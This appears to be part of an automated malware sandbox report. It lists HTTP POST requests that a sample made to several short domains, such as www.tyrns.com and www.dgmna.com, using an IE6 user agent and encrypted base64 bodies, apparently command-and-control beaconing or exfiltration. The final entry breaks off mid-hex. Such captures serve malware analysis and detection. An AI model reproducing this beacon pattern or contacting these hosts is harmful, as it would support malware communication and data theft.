3Tp9ydChBQ7LnMtBYwqB/oO5rqT4LLaHBA58fD0Br5n1GVCjk7gWby5jx5sHriw3U0InIi03kq7NX6+6QO6FIsPRRjV/Rv8036Q0tGN0eFKFLpkMshmRVFG/Dm9zdJ7/a/kvNtvNYcaWn7t+aWumLojkhzijyUjB0JMQHL736TCKrXk1Rclv7pvvMdy4I+pZmWLqmhmu7mvQETDnsNMgn10CeOX7fO1JA5raxTxkVAqw0B6zkUf0ItkiBczapApIUrwzSc0RpY7PJQyNQuaEOj0srIe/5uL1YVCzW9zTIfV4ygrlXx3qcuQPYRZsZZmLyYylK5WDq7/XX52aQ/0DmrTP43IsINzu6RcnxIBzfxcfBu8SSyZD3bgQDFnmq3YUa7wScmiDxJ3yvAVbdSDxtFgoIzyqgZfRmQSPhuUmmEalYQbhDbgirH+3cY2PUabjbxWOU5FzP2kGtzvUDbuW8sswK1zLy4lirQAKWTSdB60QRMuSWO7nzeWA3FKgQcX7YtmEwrzcDDKVo6VU0q6Z0I3ryfFJgfGIYNTPNhpcUjbFrunEKg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 43 72 50 4e 37 62 6a 50 42 67 37 53 56 75 52 71 4f 38 2b 43 38 71 74 72 74 66 51 41 5a 56 6c 44 62 4b 59 38 61 48 2f 64 42 57 66 7a 35 75 74 46 58 76 55 49 31 4d 43 38 51 4c 56 4f 59 30 7a 6d 33 4a 37 72 69 58 73 58 50 75 49 57 4e 44 56 70 59 74 6f 65 78 57 72 72 47 70 53 4f 59 7a 7a 4f 61 71 77 4e 36 72 50 57 67 70 46 70 4a 51 4e 42 4e 4a 2b 47 69 6b 7a 43 68 37 65 72 67 4c 32 54 54 56 69 64 72 48 70 4d 39 64 72 43 68 54 48 4c 59 2f 54 72 63 55 31 67 36 6a 63 55 56 4a 72 6b 69 70 4f 6d 79 6c 4f 44 46 4b 5a 39 43 5a 52 36 43 44 44 73 67 75 78 37 63 71 46 70 70 79 68 31 36 75 34 68 31 45 43 4b 6f 47 5a 38 66 4e 2f 42 4e 64 49 59 71 71 4e 43 4f 4b 4c 73 4c 6f 47 74 72 35 6a 57 69 30 33 41 62 53 68 57 64 49 73 52 38 39 30 58 49 78 34 53 71 2b 4d 45 4f 32 6c 37 51 73 35 61 4f 57 54 30 45 4b 6e 55 62 64 63 53 46 77 6d 69 6b 45 2b 62 7a 62 41 77 39 78 45 2b 58 6f 76 4c 41 54 78 46 36 38 2b 35 30 6d 7a 6c 5a 70 6c 35 63 6a 78 6d 2b 34 62 6e 5a 31 7a 5a 33 56 4f 6a 35 43 56 73 42 39 74 48 35 51 63 58 69 49 4d 6e 6b 48 48 37 62 41 2f 67 69 69 62 48 77 4b 62 56 62 6c 4d 6e 6b 71 73 4f 6b 65 61 7a 50 4d 79 59 31 4d 6a 4f 6d 59 4b 64 2f 77 77 63 77 48 34 68 2b 61 2b 32 4d 6a 78 76 42 6e 74 64 7a 77 4c 32 79 65 6f 78 58 43 44 53 73 46 52 51 49 75 6d 50 37 72 68 62 74 74 65 6e 6d 6e 6d 67 35 41 4d 4e 7a 30 4e 59 6e 54 45 6c 2b 64 52 57 74 41 6a 67 63 75 6d 65 49 71 30 53 65 55 59 4b 31 2b 72 62 68 37 34 6e 57 4e 78 6e 6d 6b 6f 37 77 46 44 2f 34 58 66 79 2f 36 77 57 5a 44 49 74 48 38 38 52 75 59 6c 46 35 4e 49 48 58 6c 35 49 32 64 43 58 42 34 53 55 64 4b 6c 48 64 4f 73 6a 33 58 4c 53 2b 70 2b 71 43 2b 59 33 49 4b 37 55 61 48 65 38 2f 59 32 4a 32 47 67 75 79 39 35 75 46 54 41 64 4d 43 35 73 50 62 38 2b 6f 36 6e 31 4b 6c 72 62 6d 38 50 56 6c 62 6c 53 4d 66 6b 33 Data Ascii: CrPN7bjPBg7SVuRqO8+C8qtrtfQAZVlDbKY8aH/dBWfz5utFXvUI1MC8QLVOY0zm3J7riXsXPuIWNDVpYtoexWrrGpSOYzzOaqwN6rPWgpFpJQNBNJ+GikzCh7ergL2TTVidrHpM9drChTHLY/TrcU1g6jcUVJrkipOmylODFKZ9CZR6CDDsgux7cqFppyh16u4h1ECKoGZ8fN/BNdIYqqNCOKLsLoGtr5jWi03AbShWdIsR890XIx4Sq+MEO2l7Qs5aOWT0EKnUbdcSFwmikE+bzbAw9xE+XovLATxF68+50mzlZpl5cjxm+4bnZ1zZ3VOj5CVsB9tH5QcXiIMnkHH7bA/giibHwKbVblMnkqsOkeazPMyY1MjOmYKd/wwcwH4h+a+2MjxvBntdzwL2yeoxXCDSsFRQIumP7rhbttenmnmg5AMNz0NYnTEl+dRWtAjgcumeIq0SeUYK1+rbh74nWNxnmko7wFD/4Xfy/6wWZDItH88RuYlF5NIHXl5I2dCXB4SUdKlHdOsj3XLS+p+qC+Y3IK7UaHe8/Y2J2Gguy95uFTAdMC5sPb8+o6n1Klrbm8PVlblSMfk3
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 33 54 70 39 79 64 43 68 42 51 37 4c 6e 4d 74 42 59 77 71 42 2f 6f 4f 35 72 71 54 34 4c 4c 61 48 42 41 35 38 66 44 30 42 72 35 6e 31 47 56 43 6a 6b 37 67 57 62 79 35 6a 78 35 73 48 72 69 77 33 55 30 49 6e 49 69 30 33 6b 71 37 4e 58 36 2b 36 51 4f 36 46 49 73 50 52 52 6a 56 2f 52 76 38 30 33 36 51 30 74 47 4e 30 65 46 4b 46 4c 70 6b 4d 73 68 6d 52 56 46 47 2f 44 6d 39 7a 64 4a 37 2f 61 2f 6b 76 4e 74 76 4e 59 63 61 57 6e 37 74 2b 61 57 75 6d 4c 6f 6a 6b 68 7a 69 6a 79 55 6a 42 30 4a 4d 51 48 4c 37 33 36 54 43 4b 72 58 6b 31 52 63 6c 76 37 70 76 76 4d 64 79 34 49 2b 70 5a 6d 57 4c 71 6d 68 6d 75 37 6d 76 51 45 54 44 6e 73 4e 4d 67 6e 31 30 43 65 4f 58 37 66 4f 31 4a 41 35 72 61 78 54 78 6b 56 41 71 77 30 42 36 7a 6b 55 66 30 49 74 6b 69 42 63 7a 61 70 41 70 49 55 72 77 7a 53 63 30 52 70 59 37 50 4a 51 79 4e 51 75 61 45 4f 6a 30 73 72 49 65 2f 35 75 4c 31 59 56 43 7a 57 39 7a 54 49 66 56 34 79 67 72 6c 58 78 33 71 63 75 51 50 59 52 5a 73 5a 5a 6d 4c 79 59 79 6c 4b 35 57 44 71 37 2f 58 58 35 32 61 51 2f 30 44 6d 72 54 50 34 33 49 73 49 4e 7a 75 36 52 63 6e 78 49 42 7a 66 78 63 66 42 75 38 53 53 79 5a 44 33 62 67 51 44 46 6e 6d 71 33 59 55 61 37 77 53 63 6d 69 44 78 4a 33 79 76 41 56 62 64 53 44 78 74 46 67 6f 49 7a 79 71 67 5a 66 52 6d 51 53 50 68 75 55 6d 6d 45 61 6c 59 51 62 68 44 62 67 69 72 48 2b 33 63 59 32 50 55 61 62 6a 62 78 57 4f 55 35 46 7a 50 32 6b 47 74 7a 76 55 44 62 75 57 38 73 73 77 4b 31 7a 4c 79 34 6c 69 72 51 41 4b 57 54 53 64 42 36 30 51 52 4d 75 53 57 4f 37 6e 7a 65 57 41 33 46 4b 67 51 63 58 37 59 74 6d 45 77 72 7a 63 44 44 4b 56 6f 36 56 55 30 71 36 5a 30 49 33 72 79 66 46 4a 67 66 47 49 59 4e 54 50 4e 68 70 63 55 6a 62 46 72 75 6e 45 4b 67 3d 3d Data Ascii: 3Tp9ydChBQ7LnMtBYwqB/oO5rqT4LLaHBA58fD0Br5n1GVCjk7gWby5jx5sHriw3U0InIi03kq7NX6+6QO6FIsPRRjV/Rv8036Q0tGN0eFKFLpkMshmRVFG/Dm9zdJ7/a/kvNtvNYcaWn7t+aWumLojkhzijyUjB0JMQHL736TCKrXk1Rclv7pvvMdy4I+pZmWLqmhmu7mvQETDnsNMgn10CeOX7fO1JA5raxTxkVAqw0B6zkUf0ItkiBczapApIUrwzSc0RpY7PJQyNQuaEOj0srIe/5uL1YVCzW9zTIfV4ygrlXx3qcuQPYRZsZZmLyYylK5WDq7/XX52aQ/0DmrTP43IsINzu6RcnxIBzfxcfBu8SSyZD3bgQDFnmq3YUa7wScmiDxJ3yvAVbdSDxtFgoIzyqgZfRmQSPhuUmmEalYQbhDbgirH+3cY2PUabjbxWOU5FzP2kGtzvUDbuW8sswK1zLy4lirQAKWTSdB60QRMuSWO7nzeWA3FKgQcX7YtmEwrzcDDKVo6VU0q6Z0I3ryfFJgfGIYNTPNhpcUjbFrunEKg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 52 6a 78 33 45 62 73 57 31 67 31 57 55 66 4e 42 55 70 79 66 64 61 52 63 75 42 2f 42 46 35 36 4d 48 31 51 68 41 64 61 4a 73 4b 55 74 42 4f 4a 4e 6c 5a 35 79 4e 65 53 2b 63 58 42 35 4c 36 55 4a 46 4a 79 4e 6b 4f 34 69 68 4b 4f 71 62 4c 58 4a 66 32 59 71 32 79 2f 5a 4f 38 45 53 73 58 44 57 43 6b 73 2b 67 31 6f 73 61 33 52 69 5a 53 6a 4d 73 35 68 74 58 63 6e 30 4c 36 78 70 75 63 6c 34 6e 55 57 6a 47 36 31 77 59 2b 77 5a 32 73 77 4a 73 4d 56 41 38 7a 51 56 44 78 71 6b 6e 53 47 2f 6f 48 35 53 69 48 72 69 43 6d 5a 2f 52 7a 46 30 68 57 61 34 6c 64 44 45 69 74 49 61 71 33 6a 44 33 68 75 48 45 49 42 34 52 42 55 68 37 33 51 4c 44 67 5a 69 39 59 36 35 34 61 59 64 69 76 2b 38 66 70 49 69 59 43 72 36 66 6a 79 52 44 38 67 75 77 4b 66 46 46 4e 4e 72 53 46 41 63 5a 54 6f 62 34 6f 7a 76 6e 53 4c 76 48 74 6a 6e 51 6f 56 4c 59 50 71 5a 73 31 62 71 42 32 41 31 73 56 6a 72 33 71 5a 71 78 44 6c 68 65 4e 7a 52 75 4f 41 6e 49 38 36 38 79 4e 58 74 4f 67 6e 6f 7a 52 64 61 6a 66 77 31 48 4c 48 4e 72 50 39 59 57 4a 37 50 77 71 35 59 57 32 51 74 61 58 55 51 73 56 41 7a 6e 58 63 56 53 53 73 4e 76 56 56 51 66 39 6a 48 66 4b 43 66 7a 6c 5a 61 48 57 5a 2b 6b 67 46 54 39 45 78 55 4d 45 51 64 6a 69 59 31 54 79 38 75 79 43 6e 33 4b 61 30 48 64 63 41 51 6d 48 6b 51 2b 54 4c 70 7a 55 43 35 35 52 45 4b 36 44 76 61 53 53 66 55 35 42 68 73 6c 74 55 44 6f 6f 4b 73 49 63 35 49 6f 59 49 65 42 42 34 7a 38 36 44 6a 71 66 43 30 78 2b 49 36 61 5a 36 42 6c 74 41 42 2b 65 47 45 46 55 31 63 57 6d 74 6c 58 41 4a 5a 44 33 42 38 35 6f 59 6c 64 32 4e 76 52 5a 74 75 78 39 30 37 75 45 47 53 51 77 57 4f 58 70 64 6c 62 66 67 4b 70 41 6a 4c 44 71 75 78 73 31 77 4f 45 52 47 50 37 49 66 46 74 4b 54 41 61 71 71 72 53 55 4d 30 45 4e 65 55 4d 35 37 78 34 66 34 44 4f 35 6f 3d Data Ascii: Rjx3EbsW1g1WUfNBUpyfdaRcuB/BF56MH1QhAdaJsKUtBOJNlZ5yNeS+cXB5L6UJFJyNkO4ihKOqbLXJf2Yq2y/ZO8ESsXDWCks+g1osa3RiZSjMs5htXcn0L6xpucl4nUWjG61wY+wZ2swJsMVA8zQVDxqknSG/oH5SiHriCmZ/RzF0hWa4ldDEitIaq3jD3huHEIB4RBUh73QLDgZi9Y654aYdiv+8fpIiYCr6fjyRD8guwKfFFNNrSFAcZTob4ozvnSLvHtjnQoVLYPqZs1bqB2A1sVjr3qZqxDlheNzRuOAnI868yNXtOgnozRdajfw1HLHNrP9YWJ7Pwq5YW2QtaXUQsVAznXcVSSsNvVVQf9jHfKCfzlZaHWZ+kgFT9ExUMEQdjiY1Ty8uyCn3Ka0HdcAQmHkQ+TLpzUC55REK6DvaSSfU5BhsltUDooKsIc5IoYIeBB4z86DjqfC0x+I6aZ6BltAB+eGEFU1cWmtlXAJZD3B85oYld2NvRZtux907uEGSQwWOXpdlbfgKpAjLDquxs1wOERGP7IfFtKTAaqqrSUM0ENeUM57x4f4DO5o=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 38 4f 6d 47 72 6d 31 78 2f 41 32 45 79 2f 6c 42 5a 43 4d 58 6d 79 59 30 6b 74 5a 62 56 54 36 74 38 55 6a 54 30 68 4c 66 48 39 4a 56 31 74 4a 41 79 66 34 42 79 2f 2b 46 4d 77 6c 55 35 6b 75 79 64 68 35 79 58 68 68 6e 77 46 63 2f 58 68 37 77 6c 6f 38 56 42 73 62 33 7a 39 58 36 44 50 5a 4d 38 30 5a 75 56 4b 63 6d 4a 42 6f 70 70 65 53 35 78 58 68 31 4b 52 72 56 47 32 2f 49 71 70 32 53 31 54 57 39 4e 4d 5a 71 34 5a 75 4a 33 43 5a 56 32 30 43 37 6d 30 70 47 7a 6f 7a 5a 4f 65 44 62 72 67 43 78 68 4c 75 69 4f 6f 6b 39 74 49 58 48 45 52 64 30 62 2b 66 55 58 61 71 39 6b 64 64 37 62 6f 70 46 56 6b 50 35 37 36 6d 62 74 7a 34 33 44 63 57 7a 30 6a 6d 56 2b 2f 51 30 2b 50 65 63 37 43 79 43 54 52 4c 63 4f 34 67 58 4e 76 4b 4e 4b 66 37 57 36 50 61 6b 6f 4d 67 6b 45 74 44 41 39 63 6a 37 54 74 2b 68 65 43 48 32 71 52 61 36 75 69 38 78 44 37 6e 49 46 42 4e 48 6c 50 68 68 2b 6d 41 58 54 52 73 48 37 48 79 46 65 4f 4e 53 64 63 78 7a 4e 76 4e 31 49 4b 6e 49 32 4b 73 66 78 79 49 5a 4d 32 71 4f 39 32 33 74 49 6e 32 39 71 43 4b 41 77 64 45 4e 6d 73 46 4e 53 54 74 37 74 53 61 6f 32 41 68 70 54 54 32 47 6e 66 36 53 4d 52 51 64 35 58 7a 7a 4c 4a 66 6c 49 4a 73 64 2f 66 36 6b 56 72 6f 74 5a 46 44 49 66 53 38 4b 59 49 56 38 4b 49 57 52 47 57 4d 76 57 47 38 58 73 72 44 6e 72 61 6d 49 2b 53 4a 4d 57 75 65 34 43 6c 49 37 34 47 51 69 58 4f 52 2b 6c 44 6b 33 2b 31 77 77 68 61 43 48 6b 64 76 37 44 33 7a 54 76 32 74 6a 4c 6c 6a 41 34 6f 44 42 41 4e 4c 63 71 55 32 6a 58 4f 62 2b 4a 61 53 65 5a 52 51 53 73 50 4c 43 6f 45 6a 45 63 2b 58 78 6d 37 65 31 49 5a 4f 62 65 6c 61 4c 68 6a 6a 58 63 37 74 6c 7a 6b 2b 6d 55 4e 45 3d Data Ascii: 8OmGrm1x/A2Ey/lBZCMXmyY0ktZbVT6t8UjT0hLfH9JV1tJAyf4By/+FMwlU5kuydh5yXhhnwFc/Xh7wlo8VBsb3z9X6DPZM80ZuVKcmJBoppeS5xXh1KRrVG2/Iqp2S1TW9NMZq4ZuJ3CZV20C7m0pGzozZOeDbrgCxhLuiOok9tIXHERd0b+fUXaq9kdd7bopFVkP576mbtz43DcWz0jmV+/Q0+Pec7CyCTRLcO4gXNvKNKf7W6PakoMgkEtDA9cj7Tt+heCH2qRa6ui8xD7nIFBNHlPhh+mAXTRsH7HyFeONSdcxzNvN1IKnI2KsfxyIZM2qO923tIn29qCKAwdENmsFNSTt7tSao2AhpTT2Gnf6SMRQd5XzzLJflIJsd/f6kVrotZFDIfS8KYIV8KIWRGWMvWG8XsrDnramI+SJMWue4ClI74GQiXOR+lDk3+1wwhaCHkdv7D3zTv2tjLljA4oDBANLcqU2jXOb+JaSeZRQSsPLCoEjEc+Xxm7e1IZObelaLhjjXc7tlzk+mUNE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 38 32 2f 38 48 6c 49 59 41 41 36 4d 69 54 48 33 42 64 73 69 58 46 57 74 44 54 36 69 4f 6a 44 32 70 72 4f 37 44 39 37 61 4f 4a 49 47 7a 2b 55 43 4a 36 6d 4e 69 76 75 30 78 52 4f 71 77 43 6a 36 48 77 2f 75 2f 32 4f 75 68 4d 64 49 74 6e 75 36 50 62 2b 34 4c 58 67 62 31 75 6d 6e 77 2f 4a 42 31 78 78 57 7a 47 62 70 76 72 62 71 51 62 4b 69 63 33 2f 69 51 55 70 65 4a 73 38 38 70 75 49 55 45 75 69 65 67 59 35 70 6e 5a 6c 48 39 55 6b 52 54 67 5a 4f 6f 56 4f 30 75 2f 57 2f 55 62 33 39 30 44 67 44 33 56 6c 56 47 6c 45 6b 31 64 6d 77 70 34 46 78 2b 57 5a 67 32 36 57 37 53 66 55 4b 36 2b 47 63 70 4f 35 36 72 7a 36 7a 4d 66 49 45 53 53 31 55 6b 53 39 4d 34 6a 51 77 65 4c 68 41 6f 2f 37 54 4e 53 54 59 4e 6b 50 4b 33 65 54 6d 52 79 41 6f 57 30 6c 6a 36 35 44 39 5a 47 62 2f 44 61 69 56 6a 5a 44 4e 33 6b 71 54 56 69 62 52 50 64 73 6d 52 47 6f 45 4a 6c 30 6f 45 68 65 39 33 6b 44 51 70 42 67 7a 59 6b 6f 66 58 46 53 37 4f 6a 37 6e 54 6c 67 63 31 45 6a 58 75 73 4b 6f 74 7a 62 6b 75 48 34 78 72 39 38 33 38 63 52 6c 31 79 69 4f 73 66 56 64 35 55 31 71 33 41 46 63 35 4b 52 76 66 4e 6e 34 56 6c 7a 55 39 79 63 42 38 4b 65 69 42 48 30 45 74 45 79 2b 33 64 6e 6e 37 4f 58 47 76 48 64 63 58 55 70 33 39 34 6b 31 6c 33 47 59 77 6b 31 32 41 67 48 75 31 76 6f 52 77 35 63 4b 70 31 75 6d 58 76 46 47 49 56 57 55 4b 57 61 59 45 58 42 46 4c 34 44 44 41 56 58 64 39 4d 35 72 4c 6b 6d 76 71 57 54 78 52 77 51 6d 73 2b 7a 42 6e 51 4a 44 43 6a 7a 37 77 41 34 6a 39 30 55 6c 57 6a 55 51 6a 6e 47 6e 44 45 33 49 37 6f 70 5a 33 4d 47 55 2f 36 6b 72 75 4a 52 6b 31 42 46 43 50 62 42 61 6e 62 43 2f 37 4c 45 31 Data Ascii: 82/8HlIYAA6MiTH3BdsiXFWtDT6iOjD2prO7D97aOJIGz+UCJ6mNivu0xROqwCj6Hw/u/2OuhMdItnu6Pb+4LXgb1umnw/JB1xxWzGbpvrbqQbKic3/iQUpeJs88puIUEuiegY5pnZlH9UkRTgZOoVO0u/W/Ub390DgD3VlVGlEk1dmwp4Fx+WZg26W7SfUK6+GcpO56rz6zMfIESS1UkS9M4jQweLhAo/7TNSTYNkPK3eTmRyAoW0lj65D9ZGb/DaiVjZDN3kqTVibRPdsmRGoEJl0oEhe93kDQpBgzYkofXFS7Oj7nTlgc1EjXusKotzbkuH4xr9838cRl1yiOsfVd5U1q3AFc5KRvfNn4VlzU9ycB8KeiBH0EtEy+3dnn7OXGvHdcXUp394k1l3GYwk12AgHu1voRw5cKp1umXvFGIVWUKWaYEXBFL4DDAVXd9M5rLkmvqWTxRwQms+zBnQJDCjz7wA4j90UlWjUQjnGnDE3I7opZ3MGU/6kruJRk1BFCPbBanbC/7LE1
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 70 6f 4a 54 33 73 33 2b 2f 51 33 4b 49 38 41 70 52 4a 48 66 42 34 59 49 5a 2f 4d 37 4c 67 75 75 55 51 53 6d 62 43 57 44 49 44 2b 4d 67 49 67 4b 33 49 50 72 41 69 75 57 65 68 33 4a 79 4a 39 45 53 33 76 35 2f 74 7a 35 6f 61 73 48 58 35 48 49 34 6d 33 77 4e 2f 2b 31 2f 2f 65 49 77 53 71 76 55 6e 41 49 5a 57 32 71 49 38 73 30 50 65 72 49 55 52 71 35 4c 31 50 7a 48 76 68 77 30 2b 45 30 4f 32 69 76 44 56 75 61 45 67 47 35 6b 64 63 7a 6a 70 77 58 2f 78 34 46 35 71 50 69 63 38 32 38 51 56 42 64 34 34 2b 78 7a 63 70 4b 50 33 59 35 63 79 56 6e 33 4c 4d 61 6a 76 69 71 39 68 36 69 4d 72 63 4d 37 58 42 4c 69 75 4b 42 4e 71 6f 72 30 45 4f 79 69 6c 36 44 55 56 73 4d 73 4e 58 31 59 35 4b 6a 35 6d 50 6c 68 34 4e 78 39 64 4e 48 39 53 4e 77 76 39 33 6a 49 31 70 53 72 53 42 6d 54 32 65 41 2b 76 7a 65 6c 50 56 66 55 32 39 7a 2b 43 4d 75 33 67 4b 56 61 39 58 39 46 6e 49 50 74 39 67 4e 4f 6d 6b 54 2f 31 63 4c 6c 78 6f 34 58 73 62 4e 65 6f 55 70 6d 31 45 70 76 51 59 77 37 6a 4d 53 75 52 7a 47 65 42 73 64 51 70 41 74 2b 54 53 49 30 34 2b 61 73 49 45 45 43 37 43 66 66 6f 5a 6f 39 70 48 73 61 59 79 33 42 33 77 51 4a 4a 31 54 2b 57 4c 35 54 5a 38 38 4b 41 4a 4d 45 50 49 6b 4e 6a 36 71 42 4a 4e 2b 44 48 77 64 6b 35 65 71 50 4a 4c 5a 59 42 56 33 45 45 79 39 72 68 76 62 64 43 4f 72 5a 6f 78 48 58 79 64 42 58 6b 4c 6d 7a 35 58 61 73 41 37 6e 54 31 55 68 6e 49 6b 65 57 43 41 76 6d 54 6b 69 30 31 73 34 6e 32 52 51 44 5a 4f 4a 66 4f 7a 37 6a 5a 68 56 6e 54 34 6e 73 33 71 36 72 63 50 36 59 56 50 71 7a 65 4f 36 63 45 7a 30 69 4a 31 4e 65 41 4f 59 43 76 57 36 42 56 2f 45 31 63 2b 61 39 53 78 51 44 47 6d 41 69 63 71 72 79 53 52 65 32 78 49 56 61 6c 67 30 72 68 4b 72 Data Ascii: poJT3s3+/Q3KI8ApRJHfB4YIZ/M7LguuUQSmbCWDID+MgIgK3IPrAiuWeh3JyJ9ES3v5/tz5oasHX5HI4m3wN/+1//eIwSqvUnAIZW2qI8s0PerIURq5L1PzHvhw0+E0O2ivDVuaEgG5kdczjpwX/x4F5qPic828QVBd44+xzcpKP3Y5cyVn3LMajviq9h6iMrcM7XBLiuKBNqor0EOyil6DUVsMsNX1Y5Kj5mPlh4Nx9dNH9SNwv93jI1pSrSBmT2eA+vzelPVfU29z+CMu3gKVa9X9FnIPt9gNOmkT/1cLlxo4XsbNeoUpm1EpvQYw7jMSuRzGeBsdQpAt+TSI04+asIEEC7CffoZo9pHsaYy3B3wQJJ1T+WL5TZ88KAJMEPIkNj6qBJN+DHwdk5eqPJLZYBV3EEy9rhvbdCOrZoxHXydBXkLmz5XasA7nT1UhnIkeWCAvmTki01s4n2RQDZOJfOz7jZhVnT4ns3q6rcP6YVPqzeO6cEz0iJ1NeAOYCvW6BV/E1c+a9SxQDGmAicqrySRe2xIValg0rhKr
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 38 4f 6d 47 72 6d 31 78 2f 41 32 45 79 2f 6c 42 5a 43 4d 58 6d 79 59 30 6b 74 5a 62 56 54 36 74 38 55 6a 54 30 68 4c 66 48 39 4a 56 31 74 4a 41 79 66 34 42 79 2f 2b 46 4d 77 6c 55 35 6b 75 79 64 68 35 79 58 68 68 6e 77 46 63 2f 58 68 37 77 6c 6f 38 56 42 73 62 33 7a 39 58 36 44 50 5a 4d 38 30 5a 75 56 4b 63 6d 4a 42 6f 70 70 65 53 35 78 58 68 31 4b 52 72 56 47 32 2f 49 71 70 32 53 31 54 57 39 4e 4d 5a 71 34 5a 75 4a 33 43 5a 56 32 30 43 37 6d 30 70 47 7a 6f 7a 5a 4f 65 44 62 72 67 43 78 68 4c 75 69 4f 6f 6b 39 74 49 58 48 45 52 64 30 62 2b 66 55 58 61 71 39 6b 64 64 37 62 6f 70 46 56 6b 50 35 37 36 6d 62 74 7a 34 33 44 63 57 7a 30 6a 6d 56 2b 2f 51 30 2b 50 65 63 37 43 79 43 54 52 4c 63 4f 34 67 58 4e 76 4b 4e 4b 66 37 57 36 50 61 6b 6f 4d 67 6b 45 74 44 41 39 63 6a 37 54 74 2b 68 65 43 48 32 71 52 61 36 75 69 38 78 44 37 6e 49 46 42 4e 48 6c 50 68 68 2b 6d 41 58 54 52 73 48 37 48 79 46 65 4f 4e 53 64 63 78 7a 4e 76 4e 31 49 4b 6e 49 32 4b 73 66 78 79 49 5a 4d 32 71 4f 39 32 33 74 49 6e 32 39 71 43 4b 41 77 64 45 4e 6d 73 46 4e 53 54 74 37 74 53 61 6f 32 41 68 70 54 54 32 47 6e 66 36 53 4d 52 51 64 35 58 7a 7a 4c 4a 66 6c 49 4a 73 64 2f 66 36 6b 56 72 6f 74 5a 46 44 49 66 53 38 4b 59 49 56 38 4b 49 57 52 47 57 4d 76 57 47 38 58 73 72 44 6e 72 61 6d 49 2b 53 4a 4d 57 75 65 34 43 6c 49 37 34 47 51 69 58 4f 52 2b 6c 44 6b 33 2b 31 77 77 68 61 43 48 6b 64 76 37 44 33 7a 54 76 32 74 6a 4c 6c 6a 41 34 6f 44 42 41 4e 4c 63 71 55 32 6a 58 4f 62 2b 4a 61 53 65 5a 52 51 53 73 50 4c 43 6f 45 6a 45 63 2b 58 78 6d 37 65 31 49 5a 4f 62 65 6c 61 4c 68 6a 6a 58 63 37 74 6c 7a 6b 2b 6d 55 4e 45 3d Data Ascii: 8OmGrm1x/A2Ey/lBZCMXmyY0ktZbVT6t8UjT0hLfH9JV1tJAyf4By/+FMwlU5kuydh5yXhhnwFc/Xh7wlo8VBsb3z9X6DPZM80ZuVKcmJBoppeS5xXh1KRrVG2/Iqp2S1TW9NMZq4ZuJ3CZV20C7m0pGzozZOeDbrgCxhLuiOok9tIXHERd0b+fUXaq9kdd7bopFVkP576mbtz43DcWz0jmV+/Q0+Pec7CyCTRLcO4gXNvKNKf7W6PakoMgkEtDA9cj7Tt+heCH2qRa6ui8xD7nIFBNHlPhh+mAXTRsH7HyFeONSdcxzNvN1IKnI2KsfxyIZM2qO923tIn29qCKAwdENmsFNSTt7tSao2AhpTT2Gnf6SMRQd5XzzLJflIJsd/f6kVrotZFDIfS8KYIV8KIWRGWMvWG8XsrDnramI+SJMWue4ClI74GQiXOR+lDk3+1wwhaCHkdv7D3zTv2tjLljA4oDBANLcqU2jXOb+JaSeZRQSsPLCoEjEc+Xxm7e1IZObelaLhjjXc7tlzk+mUNE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 78 31 52 69 2b 68 4c 6f 2f 67 32 38 78 4d 46 35 78 65 69 5a 4c 42 58 58 37 59 46 69 31 56 78 6e 5a 71 64 46 37 71 36 74 2f 47 62 77 2f 55 59 45 2b 74 51 64 37 57 46 75 57 76 4f 42 34 54 4f 47 41 43 62 57 30 2f 56 35 76 65 56 57 6a 51 2f 6e 76 4f 32 2f 2b 65 47 67 43 67 35 70 66 44 46 54 65 34 6d 57 44 6d 4a 50 37 66 68 72 55 42 35 43 57 36 58 73 33 6e 50 70 6b 6f 74 4d 2b 55 70 64 76 63 66 54 33 6d 6c 39 67 6c 72 78 32 57 37 48 63 2b 61 47 74 6e 72 45 63 46 47 63 2f 46 47 64 31 55 62 71 74 6a 43 42 4b 49 48 44 36 4c 55 71 2b 39 67 7a 75 31 66 63 58 75 45 6b 4d 72 55 76 39 69 2f 73 4c 58 45 59 46 73 6c 42 62 45 57 34 48 70 32 52 43 4a 59 65 57 55 34 38 4d 58 78 4e 65 59 7a 52 58 38 61 79 43 6a 65 47 48 71 31 37 6b 41 34 2f 7a 6c 6c 63 6c 69 78 2f 34 68 68 62 42 71 58 5a 54 38 58 66 48 6a 4a 55 77 41 39 65 37 34 51 7a 55 51 34 49 57 52 58 49 6f 78 69 4a 42 4a 33 65 43 39 77 69 65 4e 4c 7a 4e 79 71 6b 65 4d 31 58 2f 61 37 34 39 2b 31 49 6e 41 59 37 67 4f 61 77 4f 44 75 6f 4e 36 6a 59 79 35 52 59 64 75 4a 5a 47 46 68 6e 37 